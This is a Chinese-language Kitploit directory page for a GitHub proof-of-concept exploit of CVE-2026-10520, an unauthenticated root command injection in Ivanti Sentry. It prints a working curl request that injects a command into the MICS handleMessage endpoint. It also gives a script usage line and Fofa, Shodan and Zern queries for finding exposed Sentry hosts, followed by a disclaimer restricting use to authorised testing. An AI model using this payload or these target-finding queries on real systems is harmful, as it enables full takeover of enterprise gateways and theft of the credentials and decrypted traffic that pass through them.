Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-10520 — Ivanti Sentry 中通过操作系统命令注入实现的根级远程代码执行 | Kitploit
工具/GitHubGitHub/error-inside/cve-2026-10520
漏洞分析漏洞利用Web应用程序漏洞利用渗透测试命令与控制学习与教育
GitHuberror-inside/cve-2026-10520

CVE-2026-10520

Ivanti Sentry 中通过操作系统命令注入实现的根级远程代码执行

查看仓库
2个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-10520

Python CVSS License Educational

Ivanti Sentry(原 MobileIron Sentry)是一款企业安全网关,它代理移动设备与企业后端资源(电子邮件、SharePoint 和内部 Web 应用程序)之间的流量。它强制执行 移动设备管理(MDM)策略,终止加密移动会话,并为企业应用部署签发基于证书的身份验证。Sentry 实例通常面向互联网运行在 8443 端口上,暴露 MICS(Mobile Iron Configuration Service)管理 API。

CVE-2026-10520 是一个未经身份验证的操作系统命令注入漏洞,影响 R10.5.2、R10.6.2 和 R10.7.1 之前的 Ivanti Sentry 版本(CVSSv3.1:10 严重,列入 CISA KEV)。该漏洞位于 MICS API 的端点 /mics/api/v2/sentry/mics-config/handleMessage,该端点通过 URL 编码的 message POST 请求体接收 XML 封装的系统命令,且没有任何身份验证或输入验证。攻击者只要能够访问到存在漏洞的端点,就可以以 root 身份执行任意操作系统命令,从而完全控制主机——包括解密的企业流量、存储的凭据以及所有受管理的移动设备数据。

PoC

root@kitploit:~
# Inject 'id' command via MICS handleMessage endpoint (no authentication required)
curl -sk -X POST "http://example.com:8443/mics/api/v2/sentry/mics-config/handleMessage" \
  -H "User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)" \
  -H "Content-Type: application/x-www-form-urlencoded" \
  -H "Connection: close" \
  --data-urlencode "message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>"

用法

root@kitploit:~
python CVE-2026-10520-X7.py
  • Zern : title:"Ivanti System Manager: Sign In"
  • Fofa : body="sentry" && body="System Manager" && port="8443", title="Ivanti System Manager: Sign In", icon_hash=="1407597555"
  • Shodan : http.html:"Ivanti Standalone Sentry System Manager" port:8443 , http.title:Ivanti port:8443, http.html:"Ivanti" http.html:"Sentry" port:8443

资源

  • OpenCVE — Ivanti Sentry 中通过 OS 命令注入实现根级 RCE
  • NIST — CVE-2026-10520 详情
  • Ivanti Sentry — 官方产品页面

免责声明

本仓库及其内容严格仅供合法的安全研究、授权的渗透测试、教育学习以及防御目的使用。通过访问或使用此材料,您确认已完全负责确保您的活动符合所有适用法律,并且您已在测试或将这些技术应用于任何非您拥有的系统之前获得了适当的授权。

本项目作者和维护者不对因使用此信息而导致的任何损害、法律后果或滥用承担任何责任。任何用于未经授权访问、恶意活动或非法目的的行为均被明确禁止且不予支持。

请负责任地使用。遵守法律。仅测试您拥有或已获得明确书面许可的系统。

作者

  • ErrorInside // SCT

许可证

SCT-PL

下载工具